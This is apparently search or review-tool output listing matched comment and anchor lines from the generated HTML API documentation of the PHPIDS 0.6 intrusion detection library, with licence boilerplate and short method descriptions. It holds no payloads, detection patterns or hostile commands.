363-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:377 (103/257) OK | Dubious | Bad | Hide
374-		
375-			
376-	</div>
377:<a name="methodgetImpact" id="getImpact"><!-- --></a>
378-<div class="evenrow">
379-	
380-	<div class="method-header">
381-		<span class="method-title">getImpact</span> (line <span class="line-number">162</span>)
382-	</div> 
383-	
384:	<!-- ========== Info from phpDoc block ========= -->
385-<p class="short-description">Returns calculated impact</p>
386-	<ul class="tags">
387-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:401 (104/257) OK | Dubious | Bad | Hide
398-		
399-			
400-	</div>
401:<a name="methodgetIterator" id="getIterator"><!-- --></a>
402-<div class="oddrow">
403-	
404-	<div class="method-header">
405-		<span class="method-title">getIterator</span> (line <span class="line-number">223</span>)
406-	</div> 
407-	
408:	<!-- ========== Info from phpDoc block ========= -->
409-<p class="short-description">IteratorAggregate iterator getter</p>
410-<p class="description"><p>Returns an iterator to iterate over the appended filters.</p></p>
411-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:431 (105/257) OK | Dubious | Bad | Hide
428-					</dl>
429-			
430-	</div>
431:<a name="methodgetName" id="getName"><!-- --></a>
432-<div class="evenrow">
433-	
434-	<div class="method-header">
435-		<span class="method-title">getName</span> (line <span class="line-number">142</span>)
436-	</div> 
437-	
438:	<!-- ========== Info from phpDoc block ========= -->
439-<p class="short-description">Returns event name</p>
440-<p class="description"><p>The name of the event usually is the key of the variable that was  considered to be malicious</p></p>
441-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:456 (106/257) OK | Dubious | Bad | Hide
453-		
454-			
455-	</div>
456:<a name="methodgetTags" id="getTags"><!-- --></a>
457-<div class="oddrow">
458-	
459-	<div class="method-header">
460-		<span class="method-title">getTags</span> (line <span class="line-number">179</span>)
461-	</div> 
462-	
463:	<!-- ========== Info from phpDoc block ========= -->
464-<p class="short-description">Returns affected tags</p>
465-	<ul class="tags">
466-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:480 (107/257) OK | Dubious | Bad | Hide
477-		
478-			
479-	</div>
480:<a name="methodgetValue" id="getValue"><!-- --></a>
481-<div class="evenrow">
482-	
483-	<div class="method-header">
484-		<span class="method-title">getValue</span> (line <span class="line-number">152</span>)
485-	</div> 
486-	
487:	<!-- ========== Info from phpDoc block ========= -->
488-<p class="short-description">Returns event value</p>
489-	<ul class="tags">
490-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Factory.php.html:5 (108/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Factory.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Factory.php.html:22 (109/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Email.php.html:5 (110/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Email.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Email.php.html:23 (111/257) OK | Dubious | Bad | Hide
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Email.php.html:72 (112/257) OK | Dubious | Bad | Hide
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Log/Interface_php"><!-- --></a>
73-<div class="evenrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Email.php.html:83 (113/257) OK | Dubious | Bad | Hide
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Converter.php.html:5 (114/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Converter.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Converter.php.html:22 (115/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---File.php.html:5 (116/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page File.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---File.php.html:23 (117/257) OK | Dubious | Bad | Hide
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---File.php.html:72 (118/257) OK | Dubious | Bad | Hide
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Log/Interface_php"><!-- --></a>
73-<div class="evenrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---File.php.html:83 (119/257) OK | Dubious | Bad | Hide
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Monitor.php.html:5 (120/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Monitor.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Monitor.php.html:22 (121/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:5 (122/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Filter_Storage</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:24 (123/257) OK | Dubious | Bad | Hide
21-						
22-					</div>
23-	<div class="info-box-body">
24:        		<!-- ========== Info from phpDoc block ========= -->
25-<p class="short-description">Filter Storage</p>
26-<p class="description"><p>This class provides various default functions for gathering filter patterns  to be used later on by the detection mechanism. You might extend this class  to your requirements.</p></p>
27-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:140 (124/257) OK | Dubious | Bad | Hide
137-							
138-					</div>
139-		<div class="info-box-body">
140:			<a name="var$cache" id="$cache"><!-- --></A>
141-<div class="evenrow">
142-
143-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:151 (125/257) OK | Dubious | Bad | Hide
148-		</span>
149-	</div>
150-
151:	<!-- ========== Info from phpDoc block ========= -->
152-<p class="short-description">Cache container</p>
153-	<ul class="tags">
154-				<li><span class="field">var:</span> wrapper</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:163 (126/257) OK | Dubious | Bad | Hide
160-		
161-
162-</div>
163:<a name="var$cacheSettings" id="$cacheSettings"><!-- --></A>
164-<div class="oddrow">
165-
166-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:174 (127/257) OK | Dubious | Bad | Hide
171-		</span>
172-	</div>
173-
174:	<!-- ========== Info from phpDoc block ========= -->
175-<p class="short-description">Holds caching settings</p>
176-	<ul class="tags">
177-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:185 (128/257) OK | Dubious | Bad | Hide
182-		
183-
184-</div>
185:<a name="var$filterSet" id="$filterSet"><!-- --></A>
186-<div class="evenrow">
187-
188-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:196 (129/257) OK | Dubious | Bad | Hide
193-		</span>
194-	</div>
195-
196:	<!-- ========== Info from phpDoc block ========= -->
197-<p class="short-description">Filter container</p>
198-	<ul class="tags">
199-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:207 (130/257) OK | Dubious | Bad | Hide
204-		
205-
206-</div>
207:<a name="var$source" id="$source"><!-- --></A>
208-<div class="oddrow">
209-
210-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:218 (131/257) OK | Dubious | Bad | Hide
215-		</span>
216-	</div>
217-
218:	<!-- ========== Info from phpDoc block ========= -->
219-<p class="short-description">Filter source file</p>
220-	<ul class="tags">
221-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:245 (132/257) OK | Dubious | Bad | Hide
242-		<div class="info-box-body">
243-			<A NAME='method_detail'></A>
244-
245:<a name="method__construct" id="__construct"><!-- --></a>
246-<div class="evenrow">
247-	
248-	<div class="method-header">
249-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">92</span>)
250-	</div> 
251-	
252:	<!-- ========== Info from phpDoc block ========= -->
253-<p class="short-description">Constructor</p>
254-<p class="description"><p>Loads filters based on provided IDS_Init settings.</p></p>
255-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:276 (133/257) OK | Dubious | Bad | Hide
273-		
274-			
275-	</div>
276:<a name="methodaddFilter" id="addFilter"><!-- --></a>
277-<div class="oddrow">
278-	
279-	<div class="method-header">
280-		<span class="method-title">addFilter</span> (line <span class="line-number">155</span>)
281-	</div> 
282-	
283:	<!-- ========== Info from phpDoc block ========= -->
284-<p class="short-description">Adds a filter</p>
285-	<ul class="tags">
286-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:305 (134/257) OK | Dubious | Bad | Hide
302-		
303-			
304-	</div>
305:<a name="methodgetFilterFromJson" id="getFilterFromJson"><!-- --></a>
306-<div class="evenrow">
307-	
308-	<div class="method-header">
309-		<span class="method-title">getFilterFromJson</span> (line <span class="line-number">290</span>)
310-	</div> 
311-	
312:	<!-- ========== Info from phpDoc block ========= -->
313-<p class="short-description">Loads filters from Json file using ext/Json</p>
314-<p class="description"><p>This function parses the provided source file and stores the result.  If caching mode is enabled the result will be cached to increase  the performance.</p></p>
315-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:331 (135/257) OK | Dubious | Bad | Hide
328-		
329-			
330-	</div>
331:<a name="methodgetFilterFromXML" id="getFilterFromXML"><!-- --></a>
332-<div class="oddrow">
333-	
334-	<div class="method-header">
335-		<span class="method-title">getFilterFromXML</span> (line <span class="line-number">190</span>)
336-	</div> 
337-	
338:	<!-- ========== Info from phpDoc block ========= -->
339-<p class="short-description">Loads filters from XML using SimpleXML</p>
340-<p class="description"><p>This function parses the provided source file and stores the result.  If caching mode is enabled the result will be cached to increase  the performance.</p></p>
341-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:357 (136/257) OK | Dubious | Bad | Hide
354-		
355-			
356-	</div>
357:<a name="methodgetFilterSet" id="getFilterSet"><!-- --></a>
358-<div class="evenrow">
359-	
360-	<div class="method-header">
361-		<span class="method-title">getFilterSet</span> (line <span class="line-number">143</span>)
362-	</div> 
363-	
364:	<!-- ========== Info from phpDoc block ========= -->
365-<p class="short-description">Returns registered filters</p>
366-	<ul class="tags">
367-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage.html:381 (137/257) OK | Dubious | Bad | Hide
378-		
379-			
380-	</div>
381:<a name="methodsetFilterSet" id="setFilterSet"><!-- --></a>
382-<div class="oddrow">
383-	
384-	<div class="method-header">
385-		<span class="method-title">setFilterSet</span> (line <span class="line-number">129</span>)
386-	</div> 
387-	
388:	<!-- ========== Info from phpDoc block ========= -->
389-<p class="short-description">Sets the filter array</p>
390-	<ul class="tags">
391-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Interface.html:5 (138/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching_Interface</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Interface.html:23 (139/257) OK | Dubious | Bad | Hide
20-						
21-					</div>
22-	<div class="info-box-body">
23:        		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">Caching wrapper interface</p>
25-	<ul class="tags">
26-				<li><span class="field">author:</span> Lars Strojny &lt;<a href="mailto:lars@strojny.net">lars@strojny.net</a>&gt;</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Interface.html:84 (140/257) OK | Dubious | Bad | Hide
81-		<div class="info-box-body">
82-			<A NAME='method_detail'></A>
83-
84:<a name="methodgetCache" id="getCache"><!-- --></a>
85-<div class="oddrow">
86-	
87-	<div class="method-header">
88-		<span class="method-title">getCache</span> (line <span class="line-number">64</span>)
89-	</div> 
90-	
91:	<!-- ========== Info from phpDoc block ========= -->
92-<p class="short-description">Interface method</p>
93-	<ul class="tags">
94-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Interface.html:108 (141/257) OK | Dubious | Bad | Hide
105-		
106-			
107-	</div>
108:<a name="methodsetCache" id="setCache"><!-- --></a>
109-<div class="evenrow">
110-	
111-	<div class="method-header">
112-		<span class="method-title">setCache</span> (line <span class="line-number">57</span>)
113-	</div> 
114-	
115:	<!-- ========== Info from phpDoc block ========= -->
116-<p class="short-description">Interface method</p>
117-	<ul class="tags">
118-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Report.php.html:5 (142/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Report.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Report.php.html:22 (143/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching.html:5 (144/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching.html:23 (145/257) OK | Dubious | Bad | Hide
20-						
21-					</div>
22-	<div class="info-box-body">
23:        		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">Caching factory</p>
25-<p class="description"><p>This class is used as a factory to load the correct concrete caching  implementation.</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching.html:79 (146/257) OK | Dubious | Bad | Hide
76-		</div>
77-		<div class="info-box-body">
78-			<A NAME='method_detail'></A>
79:<a name="methodfactory" id="factory"><!-- --></a>
80-<div class="evenrow">
81-	
82-	<div class="method-header">
83-		<span class="method-title">static method factory</span> (line <span class="line-number">62</span>)
84-	</div> 
85-	
86:	<!-- ========== Info from phpDoc block ========= -->
87-<p class="short-description">Factory method</p>
88-	<ul class="tags">
89-				<li><span class="field">return:</span> caching facility</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:5 (147/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Log_Email</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:28 (148/257) OK | Dubious | Bad | Hide
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Log_Interface.html">IDS_Log_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">Email logging wrapper</p>
30-<p class="description"><p>The Email wrapper is designed to send reports via email. It implements the  singleton pattern.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:108 (149/257) OK | Dubious | Bad | Hide
105-		</div>
106-		<div class="info-box-body">
107-			<A NAME='method_detail'></A>
108:<a name="methodgetInstance" id="getInstance"><!-- --></a>
109-<div class="evenrow">
110-	
111-	<div class="method-header">
112-		<span class="method-title">static method getInstance</span> (line <span class="line-number">182</span>)
113-	</div> 
114-	
115:	<!-- ========== Info from phpDoc block ========= -->
116-<p class="short-description">Returns an instance of this class</p>
117-<p class="description"><p>This method allows the passed argument to be either an instance of  IDS_Init or an array.</p></p>
118-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:140 (150/257) OK | Dubious | Bad | Hide
137-			
138-	</div>
139-
140:<a name="method__construct" id="__construct"><!-- --></a>
141-<div class="oddrow">
142-	
143-	<div class="method-header">
144-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">146</span>)
145-	</div> 
146-	
147:	<!-- ========== Info from phpDoc block ========= -->
148-<p class="short-description">Constructor</p>
149-	<ul class="tags">
150-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:169 (151/257) OK | Dubious | Bad | Hide
166-		
167-			
168-	</div>
169:<a name="methodexecute" id="execute"><!-- --></a>
170-<div class="evenrow">
171-	
172-	<div class="method-header">
173-		<span class="method-title">execute</span> (line <span class="line-number">316</span>)
174-	</div> 
175-	
176:	<!-- ========== Info from phpDoc block ========= -->
177-<p class="short-description">Sends the report to registered recipients</p>
178-	<ul class="tags">
179-				<li><span class="field">throws:</span> Exception if data is no string</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:205 (152/257) OK | Dubious | Bad | Hide
202-					</dl>
203-			
204-	</div>
205:<a name="methodisSpamAttempt" id="isSpamAttempt"><!-- --></a>
206-<div class="oddrow">
207-	
208-	<div class="method-header">
209-		<span class="method-title">isSpamAttempt</span> (line <span class="line-number">210</span>)
210-	</div> 
211-	
212:	<!-- ========== Info from phpDoc block ========= -->
213-<p class="short-description">Detects spam attempts</p>
214-<p class="description"><p>To avoid mail spam through this logging class this function is used  to detect such attempts based on the alert frequency.</p></p>
215-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:230 (153/257) OK | Dubious | Bad | Hide
227-		
228-			
229-	</div>
230:<a name="methodprepareData" id="prepareData"><!-- --></a>
231-<div class="evenrow">
232-	
233-	<div class="method-header">
234-		<span class="method-title">prepareData</span> (line <span class="line-number">270</span>)
235-	</div> 
236-	
237:	<!-- ========== Info from phpDoc block ========= -->
238-<p class="short-description">Prepares data</p>
239-<p class="description"><p>Converts given data into a format that can be read in an email.  You might edit this method to your requirements.</p></p>
240-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Email.html:260 (154/257) OK | Dubious | Bad | Hide
257-		
258-			
259-	</div>
260:<a name="methodsend" id="send"><!-- --></a>
261-<div class="oddrow">
262-	
263-	<div class="method-header">
264-		<span class="method-title">send</span> (line <span class="line-number">385</span>)
265-	</div> 
266-	
267:	<!-- ========== Info from phpDoc block ========= -->
268-<p class="short-description">Sends an email</p>
269-	<ul class="tags">
270-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Database.php.html:5 (155/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Database.php</title>
